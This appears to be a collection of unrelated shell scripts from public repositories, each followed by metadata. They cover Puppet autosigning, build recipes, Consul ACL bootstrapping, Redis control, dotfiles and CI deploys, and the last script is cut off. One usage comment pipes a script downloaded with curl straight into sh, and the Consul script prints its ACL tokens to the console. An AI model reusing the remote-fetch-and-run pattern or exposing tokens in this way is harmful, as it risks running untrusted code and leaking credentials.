# Point the master at the policy script and restart to apply.
puppet config set autosign /etc/puppetlabs/puppet/autosign.sh --section master
service puppetserver restart
| true
|
ffd05b6bceec2342651b161d87748d6c1b35a8c8
|
Shell
|
Zuko/mumble-releng
|
/buildenv/win32-static/build-bzip2.bash
|
UTF-8
| 449
| 2.65625
| 3
|
[] |
no_license
|
#!/bin/bash -ex
# Fetch, verify, patch and build bzip2 1.0.6 with MSVC's nmake, then
# install the static library and header into the Mumble build prefix.
source common.bash
# Download only if not already cached, then verify integrity.
fetch_if_not_exists "http://www.bzip.org/1.0.6/bzip2-1.0.6.tar.gz"
expect_sha1 "bzip2-1.0.6.tar.gz" "3f89f861209ce81a6bab1fd1998c0ef311712002"
tar -zxf bzip2-1.0.6.tar.gz
cd bzip2-1.0.6
# Patch the MSVC makefile so the linker emits a PDB, then build via nmake.
patch -p1 < ${MUMBLE_BUILDENV_ROOT}/patches/bzip2-linker-pdb.patch
cmd /c nmake /f makefile.msc
# Install the static library and its public header into the prefix.
mkdir -p ${MUMBLE_PREFIX}/bzip2/{include,lib}
cp libbz2.lib ${MUMBLE_PREFIX}/bzip2/lib/
cp bzlib.h ${MUMBLE_PREFIX}/bzip2/include/
| true
|
5860349d15083b24b4a41705be8e3513d56fe37a
|
Shell
|
maxrd2/arch-repo
|
/packages/mingw-libs/mingw-w64-docbook-wrapper/PKGBUILD
|
UTF-8
| 441
| 2.9375
| 3
|
[] |
no_license
|
_pkgname=docbook-wrapper
pkgname=mingw-w64-$_pkgname
pkgver=1.0
pkgrel=1
arch=(any)
pkgdesc="Symlink system docbook-* packages (mingw-w64)"
license=(custom)
url='https://docbook.org/'
_architectures="i686-w64-mingw32 x86_64-w64-mingw32"
package() {
for _arch in ${_architectures}; do
install -d "$pkgdir/usr/${_arch}/share/xml"
ln -s "/usr/share/xml/docbook" "$pkgdir/usr/${_arch}/share/xml/docbook"
done
}
# vim:set sw=2 et:
| true
|
7e206cac31badc0683c9843696e7e74bcf93151e
|
Shell
|
iainthegray/vault-dr-vagrant
|
/consul_config_1.5.sh
|
UTF-8
| 2,118
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
# Bootstrap ACLs on a freshly installed Consul agent:
#   1. append an ACL stanza to the agent config and restart,
#   2. bootstrap the master ACL token,
#   3. mint an agent token and splice it into the config,
#   4. mint a Vault-scoped token for later use.
readonly DEFAULT_INSTALL_PATH="/usr/local/bin/consul"
readonly DEFAULT_CONSUL_USER="consul"
readonly DEFAULT_CONSUL_PATH="/etc/consul.d"
readonly DEFAULT_CONSUL_OPT="/opt/consul-storage/"
readonly DEFAULT_CONSUL_CONFIG="consul.hcl"
readonly DEFAULT_CONSUL_SERVICE="/etc/systemd/system/consul.service"
readonly DEFAULT_CONSUL_SERVICE_NAME="consul"
readonly SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
readonly TMP_DIR="/tmp/install"
readonly TMP_ZIP="consul.zip"
readonly SCRIPT_NAME="$(basename "$0")"
# Set the Script variables
# One of
readonly CONSUL_BIN=""
readonly CLUSTER_SIZ="1"
readonly CONSUL_CLIENT="0"
CONSUL_ADDR="http://127.0.0.1:8500"
# Strip acl config
echo "Add ACL Config"
# Append the ACL stanza; the heredoc body below is the literal HCL
# written to the agent config.
cat << EOF >> ${DEFAULT_CONSUL_PATH}/${DEFAULT_CONSUL_CONFIG}
primary_datacenter = "dc1"
acl {
enabled = true
default_policy = "deny"
down_policy = "extend-cache"
}
EOF
# Restart Consul
echo "restart Consul"
sudo systemctl stop consul
sleep 5
sudo systemctl start consul
sleep 5
# Bootstrap the master ACL token (one-shot per cluster); cut extracts the
# token value from the JSON response.
CONSUL_TOKEN=`curl --request PUT ${CONSUL_ADDR}/v1/acl/bootstrap |cut -d'"' -f4`
echo "CONSUL_TOKEN == ${CONSUL_TOKEN}"
AT=`curl --request PUT --header "X-Consul-Token: ${CONSUL_TOKEN}" --data '{"Name": "Agent Token", "Type": "client", "Rules": "node \"\" { policy = \"write\" } service \"\" { policy = \"read\" }"}' ${CONSUL_ADDR}/v1/acl/create | cut -d'"' -f4`
echo "AGENT TOKEN == ${AT}"
echo "Add agent token"
# Splice a tokens{ agent = ... } block right after the down_policy line.
# NOTE(review): -E and -z (NUL-separated, multi-line matching) are GNU sed
# extensions -- this will not work with BSD sed.
sed -i'' -Ez "s/(down_policy = \"extend-cache\"\n\s*)\}/\1 tokens \{\n agent = \"${AT}\"\n \}\n\}/g" ${DEFAULT_CONSUL_PATH}/${DEFAULT_CONSUL_CONFIG}
sudo systemctl stop consul
sleep 5
sudo systemctl start consul
sleep 5
echo "GET VAULT TOKEN"
VT=`curl --request PUT --header "X-Consul-Token: ${CONSUL_TOKEN}" --data '{"Name": "Vault Token", "Type": "client", "Rules": "node \"\" { policy = \"write\" } service \"vault\" { policy = \"write\" } agent \"\" { policy = \"write\" } key \"vault\" { policy = \"write\" } session \"\" { policy = \"write\" } "}' ${CONSUL_ADDR}/v1/acl/create | cut -d'"' -f4`
echo "VT == ${VT}"
# NOTE(review): the disabled line below refers to lowercase ${at}, but the
# token captured above is ${AT} -- confirm before ever enabling it.
# sudo sed -i'' "s/{{ vault_token }}/${at}/" /etc/vault.d/vault.hcl
| true
|
8d613770b47e1777ebfcd853b1273dbe25d05f8d
|
Shell
|
shimajima-eiji/Chocolatey
|
/wsl/git/update_clones.sh
|
UTF-8
| 1,755
| 3.8125
| 4
|
[] |
no_license
|
#!/bin/sh
<<README
CHANGELOG.mdを自動更新した時に、開発で使っている環境も更新してほしい時に自動化させる
誤作動防止のため、引数をフルパスで設定する必要がある。
# 使い方
curl https://raw.githubusercontent.com/shimajima-eiji/Chocolatey/master/wsl/git/update_clones.sh 2>/dev/null | sh -s -- ディレクトリ名1 ディレクトリ名2...
## 応用
git pullしたいパスの数だけ実施させることができるので、findコマンドで引数を与えてやるのが良い
sh -s -- $(find $(wslpath "your path") -type d -not -path "*/node_modules/*" -not -path "*/.*/*")
※不正実行防止のため、ドルマークは全角にしている。そのため、コピペ時はドルマークを半角にすること
README
# (The heredoc above is the original Japanese usage notes: this script
# "git pull"s each repository given as a full path, skipping anything
# that is not an absolute path to the root of a cloned repository.)
debug=false
# output <flag> <message>: print <message> only when <flag> is "true".
# Used as a debug trace for the [SKIP] diagnostics below.
output() {
if [ "$1" = "true" ]; then
echo "$2"
fi
}
# NOTE: ${pathes} is expanded unquoted on purpose so each whitespace-
# separated argument becomes its own loop item; paths containing spaces
# are therefore not supported.
pathes=$@
for path in ${pathes}; do
# Skip non-absolute paths (guards against accidental runs).
if [ ! "$(echo ${path} | cut -c1)" = "/" ]; then
output ${debug} "[SKIP] 誤作動を防止するため、入力はフルパスで設定すること: ${path}"
continue
# Skip paths that are not directories.
elif [ ! -d "${path}" ]; then
output ${debug} "[SKIP] 指定されたパスはディレクトリではない: ${path}"
continue
fi
cd ${path}
# Skip directories that are not a repository root (no .git inside).
if [ ! -d "${path}/.git" ]; then
output ${debug} "[SKIP] リポジトリのルートディレクトリではない: ${path}"
continue
fi
# Skip directories that git itself does not recognise as a clone.
git branch >/dev/null 2>&1
if [ ! $? = 0 ]; then
output ${debug} "[SKIP] 指定されたパスはcloneされたディレクトリではない: ${path}"
continue
fi
cd $(git rev-parse --show-toplevel)
git.exe pull --progress -v --no-rebase "origin" # plain git reportedly failed here while TortoiseGit's git.exe worked, so the .exe is used
done
| true
|
2ec661c6a0997fab148762cad7c1439f21e584c4
|
Shell
|
BoobooWei/booboo_redis
|
/shellscripts/redisctlnew.sh
|
UTF-8
| 713
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/bash
#Usage: redisctl start|stop|status|restart
# Manage the 100 redis-server instances on ports 6379-6478 as one unit.

# 同时启动多实例 -- launch every instance in the background,
# one config file per port.
start_redis(){
	for i in {6379..6478}
	do /usr/local/redis-3.0.7/src/redis-server "/data/redis/conf/redis${i}.conf" &
	done
}

# 查看所有实例的守护进程 -- report "running" only when all 100
# server processes are present.
status_redis(){
	# pgrep -c counts matches and never matches itself, replacing the
	# old ps -ef | grep | grep -v grep | wc -l pipeline.
	count=$(pgrep -cf "redis-server")
	if [ "$count" -eq 100 ]; then echo redis server is running; else echo redis server is not running; fi
}

# 停止所有实例 -- kill every instance. SIGKILL is kept from the original
# behaviour; note redis gets no chance to persist before dying.
stop_redis(){
	pkill -9 -f "redis-server"
}

case $1 in
start)
	start_redis;;
status)
	status_redis;;
stop)
	stop_redis;;
restart)
	stop_redis;
	start_redis;;
*)
	echo "Usage: redisctl start|stop|status|restart"
esac
| true
|
b8976210e770afd21d139ab4724dc42768db947e
|
Shell
|
jonprindiville/pepo
|
/push-gh-pages.sh
|
UTF-8
| 770
| 3.625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash -x
#
# push-gh-pages.sh
#
# What?
# - helps update https://jonprindiville.github.io/pepo/ by pushing new
#   index.html to the gh-pages branch
#
# How?
# - develop develop develop, commit, push new pepo.elm to master branch
# - ./push-gh-pages.sh
# - was there a new "Autoupdate" commit created in gh-pages branch?
#   - yes? push it, now it's published
#   - no? maybe you didn't actually change stuff, or elm-make barfed, or your
#     network connection flaked, or ...
# Build into a temp dir so the artifact survives the branch switch.
TMP_DIR="$(mktemp -d)";
TMP_INDEX="$TMP_DIR/index.html";
# Each step is chained with && so the first failure aborts the rest; the
# temp dir is only removed on full success (a leftover dir signals failure).
elm-make pepo.elm && \
mv index.html "$TMP_INDEX" && \
git checkout gh-pages && \
mv "$TMP_INDEX" . && \
git add index.html && \
git commit -m "Autoupdate index.html for gh-pages" && \
rmdir "$TMP_DIR";
| true
|
a48ec859cdf6278730dd185618b52a2f1c527936
|
Shell
|
pedromundo/tesseroids
|
/cookbook/tess2prism/tess2prism.sh
|
UTF-8
| 697
| 2.859375
| 3
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
# Generate a prism model from a tesseroid model.
# Prisms will have the same mass as the tesseroids and
# associated spherical coordinates of the center of
# the top of the tesseroid.
tess2prism < tess-model.txt > prism-model.txt
# Generate a regular grid in spherical coordinates,
# pipe the grid to the computation programs,
# and dump the result on output.txt
# prismpots calculates the potential in spherical
# coordinates, prismgs calculates the full
# gravity vector, and prismggts calculates the full
# gravity gradient tensor.
tessgrd -r-160/0/-80/0 -b100/100 -z250e03 | \
prismpots prism-model.txt | \
prismgs prism-model.txt | \
prismggts prism-model.txt -v > output.txt
| true
|
c4b6acb5ee06751ad26a24397515ffe8c5131bb5
|
Shell
|
michaelficarra/dotfiles
|
/bashrc
|
UTF-8
| 1,865
| 3
| 3
|
[] |
no_license
|
set -o vi
export PATH=$HOME/bin:$HOME/.local/bin:/sbin:/usr/sbin:$PATH
export TERM=xterm-256color
export GREP_OPTIONS='--color=auto'
if [ $(id -u) -eq 0 ]; then
UIDENT="#"
else
UIDENT="$"
fi
export PROMPT_COMMAND='PS1="[\u@\h \w]`
if [[ \$? = "0" ]];
then echo "\\[\\033[0;32m\\]";
else echo "\\[\\033[0;31m\\]";
fi` $UIDENT\[\e[m\] "'
export PS1
alias gitdf='git diff --color'
alias gitst='git status'
alias gitlg="git log --graph --pretty=format:'%C(bold yellow)%h%Creset \
-%C(bold red)%d%Creset %s %C(bold green)(%cr) %C(bold blue)<%an>%Creset' --abbrev-commit"
alias sl='dmesg | egrep --color "ttyUSB|ttyACM|ttyAMA"'
alias sr='resize && reset'
alias ls='ls --color'
alias ll='ls -alh'
alias webs='python -m SimpleHTTPServer'
alias please=sudo
alias fuck='sudo $(history -p \!\!)'
alias ..='cd ../../'
alias ...='cd ../../../'
alias ....='cd ../../../../'
alias .....='cd ../../../../../'
alias ......='cd ../../../../../../'
alias v=vagrant
# powerline prompt
#if [ -f ~/.local/lib/python2.7/site-packages/powerline/bindings/bash/powerline.sh ]; then
# source ~/.local/lib/python2.7/site-packages/powerline/bindings/bash/powerline.sh
#fi
function f()
{
grep -ri ${1} .
}
function pdfsplit()
{
if [ $# -eq 3 ]; then
gs -sDEVICE=pdfwrite -dNOPAUSE -dBATCH -dSAFER \
-dFirstPage=${2} \
-dLastPage=${3} \
-sOutputFile="${1%.pdf}_p${2}-p${3}.pdf" \
"${1}"
else
echo "usage: pdfsplit <source-file> <first-page> <last-page>"
fi
}
function pdfjoin()
{
  # Merge two or more PDFs into one with Ghostscript.
  # Usage: pdfjoin <merged-file> <first-pdf> [more-pdfs...]
  if [ $# -ge 3 ]; then
    local merged="${1}"
    shift
    # Pass the remaining arguments straight through instead of the old
    # hard-coded "${2}".."${13}" list, which capped the join at 12 inputs
    # and handed gs spurious empty-string arguments for unused slots.
    gs -sDEVICE=pdfwrite -dNOPAUSE -dBATCH -sOutputFile="${merged}" "$@"
  else
    echo "usage: pdfjoin <merged-file> <first-pdf> <...> <last-pdf>"
  fi
}
export GOROOT=$HOME/pkg/go
export PATH=$PATH:$GOROOT/bin
export PATH="$PATH:$HOME/.rvm/bin"
. /opt/erlang/activate
| true
|
61b1d334ef5642dae8676296371b069f2529439a
|
Shell
|
ychenut/qiandao
|
/update.sh
|
UTF-8
| 240
| 2.640625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Pull the latest sources into /usr/src/app, discarding any local changes.
cd /usr/src/app
git fetch --all
git reset --hard origin/master
git pull
# "==" is a bashism; POSIX sh only guarantees "=". Also quote the
# variable so an unset AUTO_RELOAD cannot break the test.
if [ -n "$AUTO_RELOAD" ] && [ "$AUTO_RELOAD" = "False" ]; then
	echo "Info: 请手动重启容器,或设置环境变量AUTO_RELOAD以开启热更新功能"
fi
| true
|
6c17469a9b08e4ff6c3c9c28dfa61bbe510a4467
|
Shell
|
talent518/utils
|
/pstore.sh
|
UTF-8
| 768
| 3.671875
| 4
|
[] |
no_license
|
#!/bin/sh
# Rotate pstore (ramoops) crash dumps out of /sys/fs/pstore into
# /var/pstore/NN-<timestamp>/ directories, cycling through slots 00-30.
set -e
# Optional first argument: seconds to wait before collecting.
if [ ${1:-0} -gt 0 ]; then
	sleep $1
fi
mount -t pstore pstore /sys/fs/pstore
dmpDir=/var/pstore
dmpLog=$dmpDir/sh.log
# $files is a whitespace-separated list; it is word-split on purpose below.
files=$(find /sys/fs/pstore -name "*-ramoops-*" | xargs -n 100 echo)
mkdir -p "$dmpDir"
if [ ${#files} -eq 0 ]; then
	echo "Not found file" >> "$dmpLog"
	exit 0
fi
echo "Found files: '$files'" >> "$dmpLog"
curIdFile=$dmpDir/cur.id
if [ -f "$curIdFile" ]; then
	curId=$(cat "$curIdFile")
else
	curId=0
fi
curDir="$(printf "%02d" $curId)-$(date +%Y%m%d-%H%M%S)"
# Advance the cyclic slot index (POSIX arithmetic instead of expr).
nextId=$((curId + 1))
if [ $nextId -gt 30 ]; then
	nextId=0
fi
echo $nextId > "$dmpDir/cur.id"
# was "2>&1 >> $dmpLog": that order sends stderr to the terminal, not the
# log. ">> $dmpLog 2>&1" routes both streams into the log as intended.
busybox rm -vrf "$dmpDir"/$(printf "%02d" $nextId)-* >> "$dmpLog" 2>&1
echo "Move..." >> "$dmpLog"
mkdir -p "$dmpDir/$curDir"
busybox mv -v $files "$dmpDir/$curDir" >> "$dmpLog" 2>&1
| true
|
12d7fcdcf8ee89d86181054cbbea363727cbe31d
|
Shell
|
BenJule/cm_build_scripts
|
/repo_sync_cm14
|
UTF-8
| 1,778
| 2.671875
| 3
|
[] |
no_license
|
#!/bin/bash
# Sync the CM14.1 nightly source tree with "repo sync", then rebase each
# locally tracked repo (device, kernel, vendor, ...) onto its github remote.

# Path to root of CM project directory
CM_PROJECT_DIR=~/workspace/CM14.1-Nightly
CM_DEVICE=~/workspace/CM14.1-Nightly/device/samsung/jfltexx
CM_KERNEL=~/workspace/CM14.1-Nightly/kernel/samsung/jf
CM_VENDOR=~/workspace/CM14.1-Nightly/vendor/samsung
CM_QCOM=~/workspace/CM14.1-Nightly/vendor/qcom/binaries
CM_TWRP=~/workspace/CM14.1-Nightly/bootable/recovery-twrp
CM_BUSYBOX=~/workspace/CM14.1-Nightly/external/busybox
## End Edit

# rebase_repo <dir> <branch> [message]
# If <dir> exists: enter it, optionally announce <message>, check out
# <branch>, fetch the github remote and rebase onto github/<branch>.
# Replaces six nearly identical copy-pasted blocks.
rebase_repo() {
    local dir="$1" branch="$2" msg="$3"
    if [ -d "$dir" ]; then
        cd "$dir" || return
        [ -n "$msg" ] && echo "$msg"
        git checkout "$branch"
        git fetch github
        git rebase "github/$branch"
        echo ""
    fi
}

cd "$CM_PROJECT_DIR"

# Temporarily revert the NIGHTLY build-name patch so repo sync applies
# cleanly, then re-apply it afterwards.
if [ -e "../../patches/build.name.cm14.diff" ]; then
    patch -R -p1 --no-backup-if-mismatch < ../../patches/build.name.cm14.diff
fi

repo sync --no-clone-bundle
#repo sync --force-sync --no-clone-bundle -c

if [ -e "../../patches/build.name.cm14.diff" ]; then
    echo "Setting build name to NIGHTLY"
    patch -p1 --no-backup-if-mismatch < ../../patches/build.name.cm14.diff
fi
echo ""

rebase_repo "$CM_DEVICE"  cm-14.1     "Rebasing device repo."
rebase_repo "$CM_KERNEL"  cm-14.1     "Rebasing kernel repo."
rebase_repo "$CM_VENDOR"  cm-14.1     "Rebasing vendor repo."
rebase_repo "$CM_QCOM"    cm-14.1     "Rebasing qcom repo."
# twrp tracks android-7.1 (the original printed no trailing blank line
# here; the uniform helper now does -- cosmetic only).
rebase_repo "$CM_TWRP"    android-7.1 "Update twrp repo."
rebase_repo "$CM_BUSYBOX" cm-14.1
| true
|
0bba37397aaec920b4ce245104cdaa2ed956321a
|
Shell
|
masak/tilde-bin
|
/git-wip
|
UTF-8
| 269
| 2.828125
| 3
|
[] |
no_license
|
#! /bin/bash
# Snapshot the working tree onto a "<branch>-wip" branch, then return to
# the original branch and report the commit that was created.
current=$(git symbolic-ref --short HEAD)
wip="$current-wip"
git checkout -q -b "$wip" &&
git add -A &&
git commit -q -m'wip' &&
git checkout -q "$current"
sha=$(git rev-parse --short "$wip")
echo "Stashed to $wip ($sha)"
| true
|
7a03b5a79e7584deaf401a904fce74bd4fb95ddf
|
Shell
|
eliasnorrby/dotfiles
|
/wm/bspwm/bspwmrc
|
UTF-8
| 2,140
| 2.984375
| 3
|
[
"MIT"
] |
permissive
|
#! /bin/sh
_is_callable () {
command -v "$1" >/dev/null || return 1
}
if ! _is_callable sxhkd ; then
echo "sxhkd not found : exiting"
bspc quit
exit 1
fi
xrandr --output DP-1 --auto --primary --output DVI-D-0 --auto --right-of DP-1 --output DVI-I-1 --auto --left-of DP-1
bspc monitor DVI-I-1 -d A1 A2 A3 A4 A5 A6 A7
bspc monitor DP-1 -d 1 2 3 4 5 6 7 8 9 10
bspc monitor DVI-D-0 -d B1 B2 B3 B4 B5 B6 B7
bspc config border_width 2
bspc config window_gap 10
bspc config focused_border_color "#ffcb6b"
bspc config split_ratio 0.50
bspc config borderless_monocle false
bspc config gapless_monocle false
bspc rule -a TmuxAlacritty desktop='1' follow=on
bspc rule -a Google-chrome desktop='2' follow=on
bspc rule -a jetbrains-idea-ce desktop='3' follow=on
bspc rule -a Emacs desktop='4' state=fullscreen follow=on
bspc rule -a TaskAlacritty desktop='A1' follow=on
bspc rule -a Todoist desktop='A1' follow=on
bspc rule -a Sunsama desktop='A1' follow=on
bspc rule -a "Microsoft Teams - Preview" desktop='A2' follow=on # (*)
bspc rule -a Chromium desktop='A2' follow=on
bspc rule -a firefox desktop='A3' follow=on
bspc rule -a postman desktop='A4' follow=on # (*)
bspc rule -a Slack desktop='B1' follow=on
bspc rule -a Spotify desktop='B2' # (*)
bspc rule -a Discord desktop='B3' follow=on state=fullscreen # (*)
bspc rule -a 1Password desktop='B4' follow=on
bspc rule -a VpnSession state=floating
bspc rule -a NotesAlacritty state=floating center=true rectangle=1600x1000+0+0
# (*)
# Rules don't work for electron apps - see:
# https://github.com/baskerville/bspwm/issues/291#issuecomment-145329416
# Check wm/bspwm/launch_on_desktop.sh for a workaround
# Run the given helper script with the remaining arguments, but only if it
# exists and is executable. A leading "/" means an absolute path; anything
# else is resolved relative to ~/.config.
_run_if_present() {
  target=$1
  if [ "${target#/}" = "$target" ]; then
    # No leading slash: resolve against the user's config directory.
    target="${HOME}/.config/${target}"
  fi
  [ -x "$target" ] && shift && "$target" "$@"
}
_run_if_present feh/set-background.sh ~/.wallpaper
_run_if_present polybar/launch.sh
_run_if_present picom/launch.sh
_run_if_present dunst/launch.sh
_run_if_present xkb/setup-keybindings.sh
_run_if_present arch/xinput.sh
_run_if_present sxhkd/launch.sh
_run_if_present arch/autostart.sh
| true
|
d19a426d5e8acb7203fe490585cd1d714b6a59c0
|
Shell
|
skuapso/skuapso
|
/start
|
UTF-8
| 265
| 2.96875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Build "-config <file>" arguments from every *.config in the config
# directory (default ./etc) and boot the Erlang node with them.
if [ -z "$SKUAPSO_CONFIG_DIR" ]; then
  SKUAPSO_CONFIG_DIR="./etc"
fi
CONFIG=""
# Glob directly instead of parsing ls output; the -e guard skips the
# literal pattern when no *.config file exists (same empty result as before).
for i in "$SKUAPSO_CONFIG_DIR"/*.config; do
  [ -e "$i" ] || continue
  CONFIG="$CONFIG -config $i"
done
echo "$CONFIG"
# $CONFIG is deliberately unquoted: it must word-split into separate
# "-config <file>" arguments.
erl -pa ebin -pa lib/*/ebin $CONFIG -args_file "$SKUAPSO_CONFIG_DIR/vm.args"
| true
|
d4de1213a2860558fd8c3d44697d948dfb13153a
|
Shell
|
nnh/utm_management
|
/programs/grep.sh
|
UTF-8
| 208
| 3.078125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# For each MAC address in macAddr.txt, normalise it to the
# "XXXXXX-XXXXXX" form and collect matching lines from the address lists
# into <normalised>.txt.
# NOTE: ${var//} and ${var:off:len} are bash features, so the shebang must
# be bash, not sh (the original declared #!/bin/sh).
while IFS= read -r line
do
	mac=${line//:/}                # strip the colon separators
	key=${mac:0:6}-${mac:6:12}     # OUI-device split: first 6 / remaining hex digits
	echo "$key"
	grep "$key" ../macAddressList/*.txt > "$key.txt"
done < macAddr.txt
| true
|
2d95c9b92d3cd57eb6752ccc6c5bb6598553bfa3
|
Shell
|
evicinelli/Dotfiles
|
/.config/argos/2.bluetooth-devices.5m+.sh
|
UTF-8
| 1,240
| 3.390625
| 3
|
[] |
no_license
|
#! /usr/bin/env bash
IFS=$'\n'
printmono(){
for line in $*; do
echo "$line | font=Monospace color=gray"
done
}
powered="$(bluetoothctl show | grep Powered | sed "s,\tPowered: ,,")"
[[ $powered == "yes" ]] && color="white" || color="gray"
[[ $(bluetoothctl info | grep "Paired" | awk -F': ' '{print $2}') == "yes" ]] && label="∙B∙" || label="B"
echo "$label | color=$color refresh=true"
if [[ $ARGOS_MENU_OPEN == "true" ]]; then
echo "---"
# devices=($(bluetoothctl paired-devices | cut -d' ' -f3-))
# bluetooth_id=$(rfkill list | grep Bluetooth | grep hci0 | cut -d: -f1)
for device in $(bluetoothctl paired-devices | cut -d' ' -f3-); do
echo "$device | bash=\"bluetoothctl power on && (bluetoothctl connect $(bluetoothctl paired-devices | grep $device | cut -d' ' -f2) && notify-send 'Connected to $device' || notify-send 'Connection to $device failed') \" refresh=true terminal=false"
done
echo "--"
printmono "$(bluetoothctl show $(bluetoothctl list | grep default | cut -d' ' -f2) | head -n5)"
echo "--"
echo "Power off | bash='bluetoothctl power off' terminal=false refresh=true"
echo "Power on | bash='bluetoothctl power on' terminal=false refresh=true"
fi
| true
|
20d39019d610b43d363b3924bbcb37292140f964
|
Shell
|
cloudfoundry-attic/mega-ci
|
/scripts/ci/deploy-aws-manifests/deploy-etcd-aws-manifests
|
UTF-8
| 1,520
| 3.453125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash -exu
# CI entry point: upload the etcd BOSH release and its consul dependency
# to an AWS-backed BOSH director, then deploy etcd.
ROOT="${PWD}"
# Dev release version "99999+dev.<epoch-seconds>" keeps each CI upload unique.
release_version="99999+dev.$(date +%s)"
# Create a dev release in the given directory and upload it (rebased) to
# the target director.
# Arguments: $1 - release directory, relative to $ROOT
# Globals:   ROOT, release_version, BOSH_DIRECTOR (read)
function upload_release() {
local release_path="$1"
pushd "${ROOT}/${release_path}" > /dev/null
/opt/rubies/ruby-2.2.4/bin/bosh -n create release --force --version ${release_version}
/opt/rubies/ruby-2.2.4/bin/bosh -n -t ${BOSH_DIRECTOR} upload release --rebase
popd > /dev/null
}
# Deploy the etcd manifest by running the Go helper in mega-ci.
# Globals (read): GOPATH, ROOT, MANIFEST_PATH, BOSH_DIRECTOR, BOSH_USER,
#                 BOSH_PASSWORD, AWS_* credentials/region
function deploy_etcd() {
# ~/.bashrc (which sets up the Go environment) is not safe under -u/-x;
# relax both flags just for the source, then restore them.
set +ux
source ~/.bashrc
set -ux
mkdir -p "${GOPATH}/src/github.com/cloudfoundry"
pushd "${GOPATH}/src/github.com/cloudfoundry" > /dev/null
# Symlink the checked-out repo into the GOPATH import path.
ln -s "${ROOT}/mega-ci"
pushd ./mega-ci/scripts/ci/deploy-aws-manifests > /dev/null
# Disable tracing so the BOSH/AWS credentials below are not echoed to CI logs.
set +x
go run main.go \
--manifest-path "${ROOT}/release/${MANIFEST_PATH}" \
--director "${BOSH_DIRECTOR}" \
--user "${BOSH_USER}" \
--password "${BOSH_PASSWORD}" \
--aws-access-key-id "${AWS_ACCESS_KEY_ID}" \
--aws-secret-access-key "${AWS_SECRET_ACCESS_KEY}" \
--aws-region "${AWS_DEFAULT_REGION}"
set -x
popd > /dev/null
popd > /dev/null
}
# Upload the consul dependency first, then the etcd release under test,
# and finally deploy etcd to the director.
function main() {
upload_release "consul-release"
upload_release "release"
deploy_etcd
}
# Best-effort cleanup: delete the uploaded dev releases from the director.
# Runs on every exit path via the trap below; errors are ignored (set +e)
# so a cleanup failure cannot mask the script's real exit status.
function teardown() {
set +e
/opt/rubies/ruby-2.2.4/bin/bosh -n -t ${BOSH_DIRECTOR} delete release consul ${release_version}
/opt/rubies/ruby-2.2.4/bin/bosh -n -t ${BOSH_DIRECTOR} delete release etcd ${release_version}
set -e
}
trap teardown EXIT
main
| true
|
857c4d2acb90e2ac82fb31c61ffce70082fb2bf0
|
Shell
|
koji-takahiro/FarManager
|
/misc/nightly/colorer.sh
|
UTF-8
| 1,254
| 3.609375
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
# Fetch the latest FarColorer plugin build for both architectures and
# unpack each one into the matching Far Manager output tree
# (outfinalnew{32,64}/Plugins/FarColorer).
#
# Download one FarColorer release (binary + PDB archives) and extract it.
# Arguments: $1 - bitness (32 or 64), selects the output directory
#            $2 - platform tag in the release asset name (x86 or x64)
# Returns:   0 on success, 1 if the version lookup or a download fails.
function bcolorer {
  local BIT=$1
  local PLUGIN=FarColorer
  # Declare separately from the assignment so curl's exit status is not
  # masked by "local".
  local COLORER_VERSION
  COLORER_VERSION=$(curl -fsLJ 'https://raw.githubusercontent.com/colorer/FarColorer/master/version4far.txt')
  if [ -z "$COLORER_VERSION" ]; then
    echo "Failed to get Colorer version" >&2
    return 1
  fi
  echo "Download FarColorer ${COLORER_VERSION}"
  local COLORER_PLATFORM=$2
  local COLORER_BASE_NAME=FarColorer.${COLORER_PLATFORM}.v${COLORER_VERSION}
  local COLORER_FILE_NAME=${COLORER_BASE_NAME}.7z
  local COLORER_PDB_NAME=${COLORER_BASE_NAME}.pdb.7z
  # Remove any stale archives left over from a previous (failed) run.
  rm -f -- "${COLORER_FILE_NAME}" "${COLORER_PDB_NAME}"
  local COLORER_BASE_URL=https://github.com/colorer/FarColorer/releases/download/v${COLORER_VERSION}/
  curl -fsLJO "${COLORER_BASE_URL}${COLORER_FILE_NAME}"
  curl -fsLJO "${COLORER_BASE_URL}${COLORER_PDB_NAME}"
  if [ ! -e "${COLORER_FILE_NAME}" ]; then
    echo "Can't find ${COLORER_FILE_NAME}" >&2
    return 1
  fi
  if [ ! -e "${COLORER_PDB_NAME}" ]; then
    echo "Can't find ${COLORER_PDB_NAME}" >&2
    return 1
  fi
  local COLORER_DIR=outfinalnew${BIT}/Plugins/$PLUGIN
  # -p: tolerate an already-existing plugin directory on re-runs.
  mkdir -p -- "${COLORER_DIR}"
  7z x "${COLORER_FILE_NAME}" -o"${COLORER_DIR}"
  7z x "${COLORER_PDB_NAME}" -o"${COLORER_DIR}/bin"
  rm -f -- "${COLORER_FILE_NAME}" "${COLORER_PDB_NAME}"
}

# Fetch both architectures; abort the build if either download fails.
( \
bcolorer 32 x86 && \
bcolorer 64 x64 \
) || exit 1

cd ..
| true
|
aafc2c23e8e92f88cb20240b773ca2ad3b69d7b3
|
Shell
|
dc376/it340
|
/nagioslogserver/subcomponents/kibana/upgrade
|
UTF-8
| 795
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/sh
# Upgrade the bundled Kibana web UI for Nagios Log Server: copy the new
# sources into the web root, preserve the old index.html, run post-upgrade
# modifications, and sanity-check the result.
#
# Exit on the first failing command. Set here rather than on the shebang
# line so it also takes effect when the script is run as "sh upgrade".
set -e

pkgname="kibana"

echo "Upgrading Kibana..."

# Delete the old archive
#rm -rf "$pkgname"

# Extract archive
#tar -xzf "$pkgname.tar.gz"

# Copy new files over
(
  mkdir -p /var/www/html/nagioslogserver/www
  cp -r "$pkgname"/src/* /var/www/html/nagioslogserver/www
  # Keep the previous entry point around in case a rollback is needed.
  if [ -f /var/www/html/nagioslogserver/www/index.html ]; then
    mv /var/www/html/nagioslogserver/www/index.html /var/www/html/nagioslogserver/www/index.html_old
  fi
)

# Post-upgrade modifications
./post-upgrade

# Do a simple sanity check to make sure some key files exist...
